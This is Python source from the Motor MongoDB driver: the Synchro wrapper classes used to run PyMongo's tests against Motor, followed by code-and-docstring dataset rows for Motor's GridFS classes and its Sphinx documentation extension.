    def __get__(self, obj, objtype):
        # self.name is set by SynchroMeta.
        name = self.name

        def synchro_method(*args, **kwargs):
            # Look up the Motor method at call time, then wrap its
            # synchronously returned Motor result in a Synchro object.
            motor_method = getattr(obj.delegate, name)
            return wrap_synchro(unwrap_synchro(motor_method))(*args, **kwargs)

        return synchro_method
class SynchroProperty(SynchroAttr):
    """Used to fake private properties like MongoClient.__member - don't use
    for real properties like write_concern or you'll mask missing features in
    Motor!
    """
    def __get__(self, obj, objtype):
        # Reach through Synchro -> Motor -> PyMongo; self.name is set by
        # SynchroMeta.
        return getattr(obj.delegate.delegate, self.name)

    def __set__(self, obj, val):
        # Write straight onto the underlying PyMongo object.
        return setattr(obj.delegate.delegate, self.name, val)
def wrap_outgoing(delegate_attr):
    """Return True if Synchro must wrap this Motor attribute's return value
    (chaining cursor methods and wrap methods carry marker attributes)."""
    for decoration in ('is_motorcursor_chaining_method',
                       'is_wrap_method'):
        if getattr(delegate_attr, decoration, False):
            return True

    return False
class SynchroMeta(type):
    """This metaclass customizes creation of Synchro's MongoClient, Database,
    etc., classes:

    - All asynchronized methods of Motor classes, such as
      MotorDatabase.command(), are re-synchronized.

    - Properties delegated from Motor's classes to PyMongo's, such as ``name``
      or ``host``, are delegated **again** from Synchro's class to Motor's.

    - Motor methods which return Motor class instances are wrapped to return
      Synchro class instances.

    - Certain internals accessed by PyMongo's unittests, such as _Cursor__data,
      are delegated from Synchro directly to PyMongo.
    """

    def __new__(cls, name, bases, attrs):
        # Create the class, e.g. the Synchro MongoClient or Database class.
        new_class = type.__new__(cls, name, bases, attrs)

        # delegate_class is a Motor class like MotorClient.
        delegate_class = new_class.__delegate_class__

        if delegate_class:
            # Collect attributes across the Motor MRO; iterating base-first
            # means more-derived classes overwrite their bases.
            delegated_attrs = {}

            for klass in reversed(inspect.getmro(delegate_class)):
                delegated_attrs.update(klass.__dict__)

            for attrname, delegate_attr in delegated_attrs.items():
                # If attrname is in attrs, it means Synchro has overridden
                # this attribute, e.g. Collection.aggregate which is
                # special-cased. Ignore such attrs.
                if attrname in attrs:
                    continue

                if getattr(delegate_attr, 'is_async_method', False):
                    # Re-synchronize the method.
                    setattr(new_class, attrname, Sync(attrname))
                elif wrap_outgoing(delegate_attr):
                    # Wrap Motor objects in Synchro objects.
                    wrapper = WrapOutgoing()
                    wrapper.name = attrname
                    setattr(new_class, attrname, wrapper)
                elif isinstance(delegate_attr, property):
                    # Delegate the property from Synchro to Motor.
                    setattr(new_class, attrname, delegate_attr)

        # Set DelegateProperties' and SynchroProperties' names.
        for name, attr in attrs.items():
            if isinstance(attr, (MotorAttributeFactory, SynchroAttr)):
                if attr.name is None:
                    attr.name = name

        return new_class
class Synchro(object):
    """
    Wraps a MotorClient, MotorDatabase, MotorCollection, etc. and
    makes it act like the synchronous pymongo equivalent
    """
    # NOTE(review): __metaclass__ only takes effect on Python 2 - confirm
    # the intended interpreter.
    __metaclass__ = SynchroMeta

    # Motor class wrapped by instances of this class; subclasses set it.
    __delegate_class__ = None

    def __cmp__(self, other):
        # NOTE(review): __cmp__ and the cmp() builtin are Python-2-only;
        # under Python 3 this method is never invoked - confirm intended.
        return cmp(self.delegate, other.delegate)

    def synchronize(self, async_method):
        """
        @param async_method: Bound method of a MotorClient, MotorDatabase, etc.
        @return: A synchronous wrapper around the method
        """
        @functools.wraps(async_method)
        def synchronized_method(*args, **kwargs):
            @functools.wraps(async_method)
            def partial():
                return async_method(*args, **kwargs)

            # Block the caller until the coroutine finishes on the IOLoop.
            return IOLoop.current().run_sync(partial)

        return synchronized_method
class MongoClient(Synchro):
    """Synchronous wrapper around a MotorClient."""

    __delegate_class__ = motor.MotorClient

    HOST = 'localhost'
    PORT = 27017

    _cache_credentials = SynchroProperty()
    get_database = WrapOutgoing()
    max_pool_size = SynchroProperty()
    max_write_batch_size = SynchroProperty()
    start_session = Sync()

    def __init__(self, host=None, port=None, *args, **kwargs):
        # So that TestClient.test_constants and test_types work.
        host = host if host is not None else MongoClient.HOST
        port = port if port is not None else MongoClient.PORT

        # An existing MotorClient may be supplied via the 'delegate' kwarg.
        self.delegate = kwargs.pop('delegate', None)

        # Motor passes connect=False by default.
        kwargs.setdefault('connect', True)
        if not self.delegate:
            self.delegate = self.__delegate_class__(host, port, *args, **kwargs)

    @property
    def is_locked(self):
        # MotorClient doesn't support the is_locked property.
        # Synchro has already synchronized current_op; use it.
        result = self.admin.current_op()
        return bool(result.get('fsyncLock', None))

    def __enter__(self):
        return self

    def __exit__(self, *args):
        self.delegate.close()

    def __getattr__(self, name):
        # Attribute access returns a synchro Database, like client.test.
        return Database(self, name, delegate=getattr(self.delegate, name))

    def __getitem__(self, name):
        # Subscript access returns a synchro Database, like client['test'].
        return Database(self, name, delegate=self.delegate[name])

    # For PyMongo tests that access client internals.
    _MongoClient__all_credentials = SynchroProperty()
    _MongoClient__options = SynchroProperty()
    _get_topology = SynchroProperty()
    _topology = SynchroProperty()
    _kill_cursors_executor = SynchroProperty()
class _SynchroTransactionContext(Synchro):
    """Synchronous context manager wrapping a Motor transaction context."""

    def __init__(self, delegate):
        self.delegate = delegate

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Synchronously end the session owned by the transaction context.
        self.synchronize(self.delegate._session.end_session)()
class ClientSession(Synchro):
    """Synchronous wrapper around a MotorClientSession."""

    __delegate_class__ = motor.motor_tornado.MotorClientSession

    start_transaction = WrapOutgoing()
    client = SynchroProperty()

    def __init__(self, delegate):
        self.delegate = delegate

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # BUG FIX: synchronize() only *builds* a blocking wrapper; the
        # original code never invoked it, so end_session() never ran and
        # the server session leaked. Invoke the wrapper, matching
        # _SynchroTransactionContext.__exit__.
        self.synchronize(self.delegate.end_session)()

    # For PyMongo tests that access session internals.
    _client = SynchroProperty()
    _in_transaction = SynchroProperty()
    _server_session = SynchroProperty()
    _transaction_id = SynchroProperty()
    _txn_read_preference = SynchroProperty()
class Database(Synchro):
    """Synchronous wrapper around a MotorDatabase."""

    __delegate_class__ = motor.MotorDatabase

    get_collection = WrapOutgoing()

    def __init__(self, client, name, **kwargs):
        # An existing MotorDatabase may be supplied via the 'delegate' kwarg.
        assert isinstance(client, MongoClient), (
            "Expected MongoClient, got %s"
            % repr(client))

        self._client = client
        self.delegate = kwargs.get('delegate') or motor.MotorDatabase(
            client.delegate, name, **kwargs)

        assert isinstance(self.delegate, motor.MotorDatabase), (
            "synchro.Database delegate must be MotorDatabase, not "
            " %s" % repr(self.delegate))

    @property
    def client(self):
        return self._client

    def __getattr__(self, name):
        # Attribute access returns a synchro Collection, like db.test.
        return Collection(self, name, delegate=getattr(self.delegate, name))

    def __getitem__(self, name):
        # Subscript access returns a synchro Collection, like db['test'].
        return Collection(self, name, delegate=self.delegate[name])
class Collection(Synchro):
    """Synchronous wrapper around a MotorCollection."""

    __delegate_class__ = motor.MotorCollection

    find = WrapOutgoing()
    find_raw_batches = WrapOutgoing()
    list_indexes = WrapOutgoing()
    watch = WrapOutgoing()

    def __init__(self, database, name, **kwargs):
        # An existing MotorCollection may be supplied via the 'delegate'
        # kwarg.
        if not isinstance(database, Database):
            raise TypeError(
                "First argument to synchro Collection must be synchro "
                "Database, not %s" % repr(database))

        self.database = database
        self.delegate = kwargs.get('delegate') or motor.MotorCollection(
            self.database.delegate, name, **kwargs)

        if not isinstance(self.delegate, motor.MotorCollection):
            raise TypeError(
                "Expected to get synchro Collection from Database,"
                " got %s" % repr(self.delegate))

    def aggregate(self, *args, **kwargs):
        # Motor does no I/O initially in aggregate() but PyMongo does.
        # Eagerly fetch the first batch to match PyMongo's behavior.
        func = wrap_synchro(unwrap_synchro(self.delegate.aggregate))
        cursor = func(*args, **kwargs)
        self.synchronize(cursor.delegate._get_more)()
        return cursor

    def aggregate_raw_batches(self, *args, **kwargs):
        # Motor does no I/O initially in aggregate() but PyMongo does.
        # Same eager first fetch as aggregate(), for raw batches.
        func = wrap_synchro(unwrap_synchro(self.delegate.aggregate_raw_batches))
        cursor = func(*args, **kwargs)
        self.synchronize(cursor.delegate._get_more)()
        return cursor

    def __getattr__(self, name):
        # Access to collections with dotted names, like db.test.mike
        fullname = self.name + '.' + name
        return Collection(self.database, fullname,
                          delegate=getattr(self.delegate, name))

    def __getitem__(self, name):
        # Access to collections with dotted names, like db.test['mike']
        fullname = self.name + '.' + name
        return Collection(self.database, fullname,
                          delegate=self.delegate[name])
class ChangeStream(Synchro):
    """Synchronous wrapper around a MotorChangeStream."""

    __delegate_class__ = motor.motor_tornado.MotorChangeStream

    next = Sync('next')
    close = Sync('close')

    def __init__(self, motor_change_stream):
        self.delegate = motor_change_stream

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # close is a synchronized method; this blocks until done.
        self.close()
class Cursor(Synchro):
    """Synchronous wrapper around a MotorCursor."""

    __delegate_class__ = motor.motor_tornado.MotorCursor

    batch_size = WrapOutgoing()
    rewind = WrapOutgoing()
    clone = WrapOutgoing()
    close = Sync('close')

    def __init__(self, motor_cursor):
        self.delegate = motor_cursor

    def __iter__(self):
        return self

    # These are special cases, they need to be accessed on the class, not just
    # on instances.
    @wrap_synchro
    def __copy__(self):
        return self.delegate.__copy__()

    @wrap_synchro
    def __deepcopy__(self, memo):
        return self.delegate.__deepcopy__(memo)

    def next(self):
        # Serve from the local buffer when possible; otherwise block on a
        # synchronized _get_more before trying the buffer again.
        cursor = self.delegate
        if cursor._buffer_size():
            return cursor.next_object()
        elif cursor.alive:
            self.synchronize(cursor._get_more)()
            if cursor._buffer_size():
                return cursor.next_object()

        raise StopIteration

    def __getitem__(self, index):
        if isinstance(index, slice):
            return Cursor(self.delegate[index])
        else:
            # Single index: synchronously fetch and unwrap one document.
            to_list = self.synchronize(self.delegate[index].to_list)
            return to_list(length=10000)[0]

    @property
    @wrap_synchro
    def collection(self):
        return self.delegate.collection

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.close()

        # Don't suppress exceptions.
        return False

    # For PyMongo tests that access cursor internals.
    _Cursor__data = SynchroProperty()
    _Cursor__exhaust = SynchroProperty()
    _Cursor__max_await_time_ms = SynchroProperty()
    _Cursor__max_time_ms = SynchroProperty()
    _Cursor__query_flags = SynchroProperty()
    _Cursor__query_spec = SynchroProperty()
    _Cursor__retrieved = SynchroProperty()
    _Cursor__spec = SynchroProperty()
    _read_preference = SynchroProperty()
class CommandCursor(Cursor):
    """Synchronous wrapper around a MotorCommandCursor."""
    __delegate_class__ = motor.motor_tornado.MotorCommandCursor
class GridOutCursor(Cursor):
    """Synchronous wrapper around a MotorGridOutCursor."""

    __delegate_class__ = motor.motor_tornado.MotorGridOutCursor

    def __init__(self, delegate):
        if not isinstance(delegate, motor.motor_tornado.MotorGridOutCursor):
            raise TypeError(
                "Expected MotorGridOutCursor, got %r" % delegate)

        self.delegate = delegate

    def next(self):
        # Wrap each MotorGridOut from the parent cursor in a synchro
        # GridOut; the parent raises StopIteration when exhausted.
        motor_grid_out = super(GridOutCursor, self).next()
        if motor_grid_out:
            return GridOut(self.collection, delegate=motor_grid_out)

    # Python 3 iterator protocol.
    __next__ = next
class CursorManager(object):
    """Placeholder so PyMongo tests importing CursorManager don't fail."""
    # Motor doesn't support cursor managers, just avoid ImportError.
    pass
class BulkOperationBuilder(object):
    """Placeholder so PyMongo tests importing this name don't fail."""
    pass
class GridFSBucket(Synchro):
    """Synchronous wrapper around a MotorGridFSBucket."""

    __delegate_class__ = motor.MotorGridFSBucket

    def __init__(self, database, bucket_name='fs', disable_md5=False):
        if not isinstance(database, Database):
            raise TypeError(
                "Expected Database, got %s" % repr(database))

        self.delegate = motor.MotorGridFSBucket(
            database.delegate, bucket_name, disable_md5)

    def find(self, *args, **kwargs):
        # Return a synchro GridOutCursor instead of a MotorGridOutCursor.
        motor_method = self.delegate.find
        unwrapping_method = wrap_synchro(unwrap_synchro(motor_method))
        return unwrapping_method(*args, **kwargs)
class GridIn(Synchro):
    """Synchronous wrapper around a MotorGridIn."""

    __delegate_class__ = motor.MotorGridIn

    def __init__(self, collection, **kwargs):
        """Can be created with collection and kwargs like a PyMongo GridIn,
        or with a 'delegate' keyword arg, where delegate is a MotorGridIn.
        """
        delegate = kwargs.pop('delegate', None)
        if delegate:
            self.delegate = delegate
        else:
            if not isinstance(collection, Collection):
                raise TypeError(
                    "Expected Collection, got %s" % repr(collection))

            self.delegate = motor.MotorGridIn(collection.delegate, **kwargs)

    def __getattr__(self, item):
        # Delegate unknown attributes straight to the MotorGridIn.
        return getattr(self.delegate, item)
class SynchroGridOutProperty(object):
    """Descriptor that synchronously opens the wrapped MotorGridOut
    (loading file metadata from the server) before reading the named
    attribute from it."""

    def __init__(self, name):
        self.name = name

    def __get__(self, obj, objtype):
        obj.synchronize(obj.delegate.open)()
        return getattr(obj.delegate, self.name)
class GridOut(Synchro):
    """Synchronous wrapper around a MotorGridOut."""

    __delegate_class__ = motor.MotorGridOut

    # Each property synchronously opens the file on first access.
    _id = SynchroGridOutProperty('_id')
    aliases = SynchroGridOutProperty('aliases')
    chunk_size = SynchroGridOutProperty('chunk_size')
    close = SynchroGridOutProperty('close')
    content_type = SynchroGridOutProperty('content_type')
    filename = SynchroGridOutProperty('filename')
    length = SynchroGridOutProperty('length')
    md5 = SynchroGridOutProperty('md5')
    metadata = SynchroGridOutProperty('metadata')
    name = SynchroGridOutProperty('name')
    upload_date = SynchroGridOutProperty('upload_date')

    def __init__(
            self, root_collection, file_id=None, file_document=None,
            delegate=None):
        """Can be created with collection and kwargs like a PyMongo GridOut,
        or with a 'delegate' keyword arg, where delegate is a MotorGridOut.
        """
        if delegate:
            self.delegate = delegate
        else:
            if not isinstance(root_collection, Collection):
                raise TypeError(
                    "Expected Collection, got %s" % repr(root_collection))

            self.delegate = motor.MotorGridOut(
                root_collection.delegate, file_id, file_document)

    def __getattr__(self, item):
        # Open the file (load metadata) before delegating the lookup.
        self.synchronize(self.delegate.open)()
        return getattr(self.delegate, item)

    def __setattr__(self, key, value):
        # PyMongo's GridOut prohibits setting these values; do the same
        # to make PyMongo's assertRaises tests pass.
        if key in (
                "_id", "name", "content_type", "length", "chunk_size",
                "upload_date", "aliases", "metadata", "md5"):
            raise AttributeError()

        super(GridOut, self).__setattr__(key, value)
class TimeModule(object):
    """Fake time module so time.sleep() lets other tasks run on the IOLoop.

    See e.g. test_schedule_refresh() in test_replica_set_client.py.
    """

    def __getattr__(self, item):
        # Everything other than 'sleep' passes straight through to the
        # real time module.
        if item != 'sleep':
            return getattr(time, item)

        def sleep(seconds):
            # Instead of blocking, run the IOLoop until a timeout fires,
            # letting other scheduled callbacks make progress.
            loop = IOLoop.current()
            loop.add_timeout(time.time() + seconds, loop.stop)
            loop.start()

        return sleep
|
mongodb/motor | motor/motor_gridfs.py | AgnosticGridOutCursor.next_object | python | def next_object(self):
grid_out = super(self.__class__, self).next_object()
if grid_out:
grid_out_class = create_class_with_framework(
AgnosticGridOut, self._framework, self.__module__)
return grid_out_class(self.collection, delegate=grid_out)
else:
# Exhausted.
return None | Get next GridOut object from cursor. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/motor_gridfs.py#L70-L80 | null | class AgnosticGridOutCursor(AgnosticBaseCursor):
__motor_class_name__ = 'MotorGridOutCursor'
__delegate_class__ = gridfs.GridOutCursor
add_option = MotorCursorChainingMethod()
address = ReadOnlyProperty()
collation = ReadOnlyProperty()
comment = MotorCursorChainingMethod()
distinct = AsyncRead()
explain = AsyncRead()
hint = MotorCursorChainingMethod()
limit = MotorCursorChainingMethod()
max = MotorCursorChainingMethod()
max_await_time_ms = MotorCursorChainingMethod()
max_scan = MotorCursorChainingMethod()
max_time_ms = MotorCursorChainingMethod()
min = MotorCursorChainingMethod()
remove_option = MotorCursorChainingMethod()
skip = MotorCursorChainingMethod()
sort = MotorCursorChainingMethod(doc=cursor_sort_doc)
where = MotorCursorChainingMethod()
# PyMongo's GridOutCursor inherits __die from Cursor.
_Cursor__die = AsyncCommand()
    def clone(self):
        """Get a clone of this cursor."""
        return self.__class__(self.delegate.clone(), self.collection)

    def rewind(self):
        """Rewind this cursor to its unevaluated state."""
        self.delegate.rewind()
        self.started = False
        return self

    def _empty(self):
        # True if the underlying PyMongo cursor holds no results.
        return self.delegate._Cursor__empty

    def _query_flags(self):
        return self.delegate._Cursor__query_flags

    def _data(self):
        # Buffered documents not yet consumed.
        return self.delegate._Cursor__data

    def _clear_cursor_id(self):
        self.delegate._Cursor__id = 0

    def _close_exhaust_cursor(self):
        # Exhaust MotorGridOutCursors are prohibited.
        pass

    def _killed(self):
        return self.delegate._Cursor__killed

    @motor_coroutine
    def _close(self):
        # Asynchronously kill the server-side cursor via PyMongo's __die.
        yield self._framework.yieldable(self._Cursor__die())
|
mongodb/motor | motor/motor_gridfs.py | AgnosticGridOut.open | python | def open(self):
return self._framework.chain_return_value(self._ensure_file(),
self.get_io_loop(),
self) | Retrieve this file's attributes from the server.
Returns a Future.
.. versionchanged:: 2.0
No longer accepts a callback argument.
.. versionchanged:: 0.2
:class:`~motor.MotorGridOut` now opens itself on demand, calling
``open`` explicitly is rarely needed. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/motor_gridfs.py#L207-L221 | [
"def get_io_loop(self):\n return self.io_loop\n"
] | class AgnosticGridOut(object):
"""Class to read data out of GridFS.
MotorGridOut supports the same attributes as PyMongo's
:class:`~gridfs.grid_file.GridOut`, such as ``_id``, ``content_type``,
etc.
You don't need to instantiate this class directly - use the
methods provided by :class:`~motor.MotorGridFSBucket`. If it **is**
instantiated directly, call :meth:`open`, :meth:`read`, or
:meth:`readline` before accessing its attributes.
"""
__motor_class_name__ = 'MotorGridOut'
__delegate_class__ = gridfs.GridOut
_ensure_file = AsyncCommand()
_id = MotorGridOutProperty()
aliases = MotorGridOutProperty()
chunk_size = MotorGridOutProperty()
close = MotorGridOutProperty()
content_type = MotorGridOutProperty()
filename = MotorGridOutProperty()
length = MotorGridOutProperty()
md5 = MotorGridOutProperty()
metadata = MotorGridOutProperty()
name = MotorGridOutProperty()
read = AsyncRead()
readchunk = AsyncRead()
readline = AsyncRead()
seek = DelegateMethod()
tell = DelegateMethod()
upload_date = MotorGridOutProperty()
def __init__(
self,
root_collection,
file_id=None,
file_document=None,
delegate=None,
):
collection_class = create_class_with_framework(
AgnosticCollection, self._framework, self.__module__)
if not isinstance(root_collection, collection_class):
raise TypeError(
"First argument to MotorGridOut must be "
"MotorCollection, not %r" % root_collection)
if delegate:
self.delegate = delegate
else:
self.delegate = self.__delegate_class__(
root_collection.delegate,
file_id,
file_document)
self.io_loop = root_collection.get_io_loop()
# python.org/dev/peps/pep-0492/#api-design-and-implementation-revisions
if PY35:
exec(textwrap.dedent("""
def __aiter__(self):
return self
async def __anext__(self):
chunk = await self.readchunk()
if chunk:
return chunk
raise StopAsyncIteration()
"""), globals(), locals())
def __getattr__(self, item):
if not self.delegate._file:
raise pymongo.errors.InvalidOperation(
"You must call MotorGridOut.open() before accessing "
"the %s property" % item)
return getattr(self.delegate, item)
@coroutine_annotation
def get_io_loop(self):
return self.io_loop
@motor_coroutine
def stream_to_handler(self, request_handler):
"""Write the contents of this file to a
:class:`tornado.web.RequestHandler`. This method calls
:meth:`~tornado.web.RequestHandler.flush` on
the RequestHandler, so ensure all headers have already been set.
For a more complete example see the implementation of
:class:`~motor.web.GridFSHandler`.
.. code-block:: python
class FileHandler(tornado.web.RequestHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self, filename):
db = self.settings['db']
fs = yield motor.MotorGridFSBucket(db())
try:
gridout = yield fs.open_download_stream_by_name(filename)
except gridfs.NoFile:
raise tornado.web.HTTPError(404)
self.set_header("Content-Type", gridout.content_type)
self.set_header("Content-Length", gridout.length)
yield gridout.stream_to_handler(self)
self.finish()
.. seealso:: Tornado `RequestHandler <http://tornadoweb.org/en/stable/web.html#request-handlers>`_
"""
written = 0
while written < self.length:
# Reading chunk_size at a time minimizes buffering.
f = self._framework.yieldable(self.read(self.chunk_size))
yield f
chunk = f.result()
# write() simply appends the output to a list; flush() sends it
# over the network and minimizes buffering in the handler.
request_handler.write(chunk)
request_handler.flush()
written += len(chunk)
|
mongodb/motor | motor/motor_gridfs.py | AgnosticGridOut.stream_to_handler | python | def stream_to_handler(self, request_handler):
written = 0
while written < self.length:
# Reading chunk_size at a time minimizes buffering.
f = self._framework.yieldable(self.read(self.chunk_size))
yield f
chunk = f.result()
# write() simply appends the output to a list; flush() sends it
# over the network and minimizes buffering in the handler.
request_handler.write(chunk)
request_handler.flush()
written += len(chunk) | Write the contents of this file to a
:class:`tornado.web.RequestHandler`. This method calls
:meth:`~tornado.web.RequestHandler.flush` on
the RequestHandler, so ensure all headers have already been set.
For a more complete example see the implementation of
:class:`~motor.web.GridFSHandler`.
.. code-block:: python
class FileHandler(tornado.web.RequestHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self, filename):
db = self.settings['db']
fs = yield motor.MotorGridFSBucket(db())
try:
gridout = yield fs.open_download_stream_by_name(filename)
except gridfs.NoFile:
raise tornado.web.HTTPError(404)
self.set_header("Content-Type", gridout.content_type)
self.set_header("Content-Length", gridout.length)
yield gridout.stream_to_handler(self)
self.finish()
.. seealso:: Tornado `RequestHandler <http://tornadoweb.org/en/stable/web.html#request-handlers>`_ | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/motor_gridfs.py#L227-L266 | null | class AgnosticGridOut(object):
"""Class to read data out of GridFS.
MotorGridOut supports the same attributes as PyMongo's
:class:`~gridfs.grid_file.GridOut`, such as ``_id``, ``content_type``,
etc.
You don't need to instantiate this class directly - use the
methods provided by :class:`~motor.MotorGridFSBucket`. If it **is**
instantiated directly, call :meth:`open`, :meth:`read`, or
:meth:`readline` before accessing its attributes.
"""
__motor_class_name__ = 'MotorGridOut'
__delegate_class__ = gridfs.GridOut
_ensure_file = AsyncCommand()
_id = MotorGridOutProperty()
aliases = MotorGridOutProperty()
chunk_size = MotorGridOutProperty()
close = MotorGridOutProperty()
content_type = MotorGridOutProperty()
filename = MotorGridOutProperty()
length = MotorGridOutProperty()
md5 = MotorGridOutProperty()
metadata = MotorGridOutProperty()
name = MotorGridOutProperty()
read = AsyncRead()
readchunk = AsyncRead()
readline = AsyncRead()
seek = DelegateMethod()
tell = DelegateMethod()
upload_date = MotorGridOutProperty()
def __init__(
self,
root_collection,
file_id=None,
file_document=None,
delegate=None,
):
collection_class = create_class_with_framework(
AgnosticCollection, self._framework, self.__module__)
if not isinstance(root_collection, collection_class):
raise TypeError(
"First argument to MotorGridOut must be "
"MotorCollection, not %r" % root_collection)
if delegate:
self.delegate = delegate
else:
self.delegate = self.__delegate_class__(
root_collection.delegate,
file_id,
file_document)
self.io_loop = root_collection.get_io_loop()
# python.org/dev/peps/pep-0492/#api-design-and-implementation-revisions
if PY35:
exec(textwrap.dedent("""
def __aiter__(self):
return self
async def __anext__(self):
chunk = await self.readchunk()
if chunk:
return chunk
raise StopAsyncIteration()
"""), globals(), locals())
def __getattr__(self, item):
if not self.delegate._file:
raise pymongo.errors.InvalidOperation(
"You must call MotorGridOut.open() before accessing "
"the %s property" % item)
return getattr(self.delegate, item)
@coroutine_annotation
def open(self):
"""Retrieve this file's attributes from the server.
Returns a Future.
.. versionchanged:: 2.0
No longer accepts a callback argument.
.. versionchanged:: 0.2
:class:`~motor.MotorGridOut` now opens itself on demand, calling
``open`` explicitly is rarely needed.
"""
return self._framework.chain_return_value(self._ensure_file(),
self.get_io_loop(),
self)
def get_io_loop(self):
return self.io_loop
@motor_coroutine
|
mongodb/motor | motor/motor_gridfs.py | AgnosticGridFSBucket.find | python | def find(self, *args, **kwargs):
cursor = self.delegate.find(*args, **kwargs)
grid_out_cursor = create_class_with_framework(
AgnosticGridOutCursor, self._framework, self.__module__)
return grid_out_cursor(cursor, self.collection) | Find and return the files collection documents that match ``filter``.
Returns a cursor that iterates across files matching
arbitrary queries on the files collection. Can be combined
with other modifiers for additional control.
For example::
cursor = bucket.find({"filename": "lisa.txt"}, no_cursor_timeout=True)
while (yield cursor.fetch_next):
grid_out = cursor.next_object()
data = yield grid_out.read()
This iterates through all versions of "lisa.txt" stored in GridFS.
Note that setting no_cursor_timeout to True may be important to
prevent the cursor from timing out during long multi-file processing
work.
As another example, the call::
most_recent_three = fs.find().sort("uploadDate", -1).limit(3)
would return a cursor to the three most recently uploaded files
in GridFS.
Follows a similar interface to
:meth:`~motor.MotorCollection.find`
in :class:`~motor.MotorCollection`.
:Parameters:
- `filter`: Search query.
- `batch_size` (optional): The number of documents to return per
batch.
- `limit` (optional): The maximum number of documents to return.
- `no_cursor_timeout` (optional): The server normally times out idle
cursors after an inactivity period (10 minutes) to prevent excess
memory use. Set this option to True prevent that.
- `skip` (optional): The number of documents to skip before
returning.
- `sort` (optional): The order by which to sort results. Defaults to
None.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`, created with
:meth:`~MotorClient.start_session`.
If a :class:`~pymongo.client_session.ClientSession` is passed to
:meth:`find`, all returned :class:`MotorGridOut` instances
are associated with that session.
.. versionchanged:: 1.2
Added session parameter. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/motor_gridfs.py#L457-L514 | [
"def create_class_with_framework(cls, framework, module_name):\n motor_class_name = framework.CLASS_PREFIX + cls.__motor_class_name__\n cache_key = (cls, motor_class_name, framework)\n cached_class = _class_cache.get(cache_key)\n if cached_class:\n return cached_class\n\n new_class = type(str(... | class AgnosticGridFSBucket(object):
__motor_class_name__ = 'MotorGridFSBucket'
__delegate_class__ = gridfs.GridFSBucket
delete = AsyncCommand()
download_to_stream = AsyncCommand()
download_to_stream_by_name = AsyncCommand()
open_download_stream = AsyncCommand().wrap(gridfs.GridOut)
open_download_stream_by_name = AsyncCommand().wrap(gridfs.GridOut)
open_upload_stream = DelegateMethod().wrap(gridfs.GridIn)
open_upload_stream_with_id = DelegateMethod().wrap(gridfs.GridIn)
rename = AsyncCommand()
upload_from_stream = AsyncCommand()
upload_from_stream_with_id = AsyncCommand()
def __init__(self, database, collection="fs", disable_md5=False):
"""Create a handle to a GridFS bucket.
Raises :exc:`~pymongo.errors.ConfigurationError` if `write_concern`
is not acknowledged.
This class conforms to the `GridFS API Spec
<https://github.com/mongodb/specifications/blob/master/source/gridfs/gridfs-spec.rst>`_
for MongoDB drivers.
:Parameters:
- `database`: database to use.
- `bucket_name` (optional): The name of the bucket. Defaults to 'fs'.
- `chunk_size_bytes` (optional): The chunk size in bytes. Defaults
to 255KB.
- `write_concern` (optional): The
:class:`~pymongo.write_concern.WriteConcern` to use. If ``None``
(the default) db.write_concern is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) db.read_preference is used.
- `disable_md5` (optional): When True, MD5 checksums will not be
computed for uploaded files. Useful in environments where MD5
cannot be used for regulatory or other reasons. Defaults to False.
.. versionadded:: 1.0
.. mongodoc:: gridfs
"""
db_class = create_class_with_framework(
AgnosticDatabase, self._framework, self.__module__)
if not isinstance(database, db_class):
raise TypeError(
"First argument to %s must be MotorDatabase, not %r" % (
self.__class__, database))
self.io_loop = database.get_io_loop()
self.collection = database[collection]
self.delegate = self.__delegate_class__(
database.delegate,
collection,
disable_md5=disable_md5)
def get_io_loop(self):
return self.io_loop
    def wrap(self, obj):
        """Wrap a PyMongo GridIn, GridOut, or GridOutCursor returned by
        the delegate in the matching Motor class for this framework."""
        if obj.__class__ is grid_file.GridIn:
            grid_in_class = create_class_with_framework(
                AgnosticGridIn, self._framework, self.__module__)
            return grid_in_class(
                root_collection=self.collection,
                delegate=obj)

        elif obj.__class__ is grid_file.GridOut:
            grid_out_class = create_class_with_framework(
                AgnosticGridOut, self._framework, self.__module__)
            return grid_out_class(
                root_collection=self.collection,
                delegate=obj)

        elif obj.__class__ is gridfs.GridOutCursor:
            grid_out_class = create_class_with_framework(
                AgnosticGridOutCursor, self._framework, self.__module__)
            return grid_out_class(
                cursor=obj,
                collection=self.collection)
|
mongodb/motor | doc/motor_extensions.py | get_motor_attr | python | def get_motor_attr(motor_class, name, *defargs):
attr = safe_getattr(motor_class, name)
# Store some info for process_motor_nodes()
full_name = '%s.%s.%s' % (
motor_class.__module__, motor_class.__name__, name)
full_name_legacy = 'motor.%s.%s.%s' % (
motor_class.__module__, motor_class.__name__, name)
# These sub-attributes are set in motor.asynchronize()
has_coroutine_annotation = getattr(attr, 'coroutine_annotation', False)
is_async_method = getattr(attr, 'is_async_method', False)
is_cursor_method = getattr(attr, 'is_motorcursor_chaining_method', False)
if is_async_method or is_cursor_method:
pymongo_method = getattr(
motor_class.__delegate_class__, attr.pymongo_method_name)
else:
pymongo_method = None
# attr.doc is set by statement like 'error = AsyncRead(doc="OBSOLETE")'.
is_pymongo_doc = pymongo_method and attr.__doc__ == pymongo_method.__doc__
motor_info[full_name] = motor_info[full_name_legacy] = {
'is_async_method': is_async_method or has_coroutine_annotation,
'is_pymongo_docstring': is_pymongo_doc,
'pymongo_method': pymongo_method,
}
return attr | If any Motor attributes can't be accessed, grab the equivalent PyMongo
attribute. While we're at it, store some info about each attribute
in the global motor_info dict. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/doc/motor_extensions.py#L127-L160 | null | # Copyright 2012-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
